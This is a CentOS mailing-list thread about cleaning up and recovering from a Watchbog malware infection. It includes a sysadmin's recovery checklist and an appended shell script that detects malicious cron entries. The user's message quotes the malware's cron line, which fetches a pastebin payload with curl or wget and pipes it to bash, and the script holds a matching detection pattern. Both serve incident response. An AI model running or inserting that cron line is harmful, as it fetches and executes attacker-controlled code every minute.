On 12/17/18 2:57 PM, Mauricio Tavares wrote:
> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
> <kaushalshriyan at gmail.com> wrote:
>>
>> Hi,
>>
>> Is there a way to find out how the CentOS 7.5 Linux box got infected with
>> malware?
>> Currently I am referring to
>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>> to carry out the below steps, which are done manually.
>>
>> 1) rm -fr /tmp/*timesyncc.service*
>> 2) crontab -e -u apigee
>>    delete the cron entry
>>    */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>> 3) ps aux | grep watchbog
>>    kill -9 $(pidof watchbog)
>>
>> Any suggestions or recommendations to find out how the CentOS 7.5 Linux box got
>> infected with Watchbog Malware. Is there any open source software which can
>
> do you have untampered log files?
>
>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?

Standard compromise recovery procedure since forever is (your local policy may have slightly different order about notifications and similar):

1. Back up all user data.
2. Wipe hard drive or whatever storage system you have (some malware potentially can flash itself instead of the BIOS, but I haven't seen any of really existing actually do that - experts probably will chime in here).
3. Freshly re-install system, update, configure with all security precautions in mind, restore users and user data.
4. Fresh sshd installation takes care of generation of new server key pair, just don't copy and re-use old pair.
5. Revoke old SSL certificate(s), and recreate and sign new one(s) - with new secret key.
6. Notify superiors and all users about compromise; stress that users have to change their password and key pair(s) on this machine, and should consider compromised their accounts on machines they connected to from this machine after compromise happened.

As thorough forensics often takes longer than two weeks, you can not tell right away the exact date of original compromise (not the obvious one you see on the surface now), so suggest they change passwords (and key pairs) on machines they ever connected to from the compromised one. And make them aware that they should apply it as a chain (about accounts on machines further in the chain of connections).

To prevent re-occurrence of the above: update, update, update. Never install anything that is not coming from a source you trust, anything that is not downloaded by yourself from a trusted source. Paranoia is in the sysadmin's job description. Install a host based intrusion detection system. Do your own research and choose what is suitable for your situation.

I hope this helps.

Valeri

>>
>> Thanks in Advance.
>>
>> Best Regards,
>>
>> Kaushal
>> _______________________________________________
>> CentOS mailing list
>> CentOS at centos.org
>> https://lists.centos.org/mailman/listinfo/centos

-- 
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
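As an added example (not from anyone in the thread), a small POSIX shell audit that flags crontab entries of the download-and-execute shape quoted above, counts them, and lists the URLs they fetch, so an admin can confirm the cleanup and check proxy or DNS logs for the first fetch when dating the compromise. The sample crontab is constructed; the live_checks function, the /var/spool/cron location of per-user crontabs and the use of pgrep are assumptions for a CentOS 7 host.

```shell
#!/bin/sh
# Constructed sample crontab for offline testing. The download-and-execute
# line reproduces the entry quoted in the thread; the other lines are made up.
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
30 4 * * 1 /usr/sbin/logrotate /etc/logrotate.conf'

# Print the non-comment lines of a crontab ($1, as text) in which curl or wget
# output is piped straight into sh/bash. Exit status is grep's: 0 if any match.
suspicious_cron_lines() {
    printf '%s\n' "$1" |
        grep -v '^[[:space:]]*#' |
        grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Number of such lines, always printed (0 when clean) so callers can compare.
count_suspicious_cron_lines() {
    n=$(suspicious_cron_lines "$1" | grep -c . || true)
    printf '%s\n' "$n"
}

# Distinct URLs fetched by the flagged lines: what to block at egress and to
# search for in proxy/DNS logs when working out when the infection began.
extract_fetch_urls() {
    suspicious_cron_lines "$1" | grep -oE 'https?://[^[:space:]|)]+' | sort -u
}

# Live checks for this host (run as root). Assumes CentOS-style per-user
# crontabs under /var/spool/cron, and looks for the dropped /tmp file and the
# process name given in the thread. Not exercised by the offline sample above.
live_checks() {
    for f in /var/spool/cron/*; do
        [ -f "$f" ] || continue
        suspicious_cron_lines "$(cat "$f")" | sed "s|^|$(basename "$f"): |"
    done
    ls -l /tmp/*timesyncc.service* 2>/dev/null
    pgrep -a watchbog
}

if [ "${1:-}" = "--live" ]; then
    live_checks
fi
```

Run with `--live` on the affected box to check the real crontabs; without arguments the functions are only defined, ready for use on saved crontab copies from backups or other hosts.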